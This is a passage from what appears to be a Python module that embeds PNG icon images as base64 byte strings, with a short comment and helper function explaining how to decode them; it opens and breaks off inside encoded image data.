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'
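# The constants that follow (ICON_DATA and DARK_DONUT_DATA) are PNG images
# stored as base64 text inside bytes literals; the b'iVBORw0KGgo...' prefix
# is the base64 encoding of the PNG magic header. A minimal decoding sketch,
# assuming nothing beyond the standard library -- the helper name is
# hypothetical and not used elsewhere in this module, and the Pillow call in
# the usage comment is an assumption for illustration only:
def _decode_embedded_png(data):
    """Return the raw PNG bytes for a base64-encoded image constant."""
    import base64  # local import keeps this sketch self-contained
    return base64.b64decode(data)
# Usage sketch (assumes Pillow): Image.open(io.BytesIO(_decode_embedded_png(ICON_DATA)))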
ICON_DATA = b'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